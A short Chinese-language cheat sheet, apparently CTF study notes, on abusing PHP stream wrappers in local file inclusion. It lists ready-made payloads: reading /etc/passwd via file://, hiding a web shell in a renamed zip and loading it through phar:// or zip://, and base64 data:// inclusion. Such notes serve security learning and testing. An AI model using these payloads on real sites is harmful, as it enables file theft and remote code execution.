php伪协议

文件包含是否支持%00截断取决于：

PHP版本<=5.2，可以使用%00进行截断

php支持的伪协议有：

• php:// 访问各个输入/输出流（I/O streams）

• file:// 访问本地文件系统

• phar:// PHP归档

• zlib:// 压缩流

• data:// 数据（RFC 2397）

• http:// 访问http（s）网址

• ftp:// 访问FTP（s）URLs

• glob:// 查找匹配的文件路径模式

• ssh2:// secure shell 2

• rar:// RAR

• ogg:// 音频流

• expect:// 处理交互式的流

• php://协议-php://filter与php://input

php://filte：在allow_url_fopen,allow_url_include 都关闭的情况下可以正常使用，主要用于读取源代码并进行base64编码输出

php://input:访问各个输入/输出流。比赛中经常使用file_get_contents获取php://input内容（post），需要开启allow_url_include,并且当enctype="multipart/from-data"的时候php://input是无效的

• file://协议

用于访问本地文件系统，并且不受allow_url_fopen,allow_url_include影响，file://还经常和curl函数（SSRF）结合在一起

使用方法：

file:// [文件的绝对路径和文件名]

file:///etc/passwd

• phar://协议

PHP归档，常常跟文件包含，文件上传结合考察。当文件上传仅仅校验mime类型与文件后缀，可以通过以下命令进行利用。

nac.php（木马）->压缩->nac.zip->改后缀->nac.jpg->上传->phar://nac.jpg/nac.php

• zlib://协议

zip://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用，使用如下：

• file.php?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]

• file.php?file=zip://nac.jpg#nac.php 其中get请求中#需要进行编码，即%23

bzip2://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用，使用如下：

• file.php?file=compress.bzip2://nac.bz2

• file.php?file=compress.bzip2://./nac.jpg

• file.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

zlib://:在allow_url_fopen,allow_url_include都关闭的情况下可以正常使用，使用如下：

• file.php?file=compress.zlib://file.gz

• file.php?file=compress.zlib://./nac.jpg

• file.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

• data://协议

data://:需满足allow_url_fopen,allow_url_include同时开启才能使用，使用如下：

• file.php?file=data://text/plain,

• file.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

• file.php?file=data:text/plain,

• file.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

参考链接：

https://blog.csdn.net/weixin_42349846/article/details/83721984

https://www.cnblogs.com/weiliangblogs/p/11736542.html

https://www.jianshu.com/p/0a8339fcc269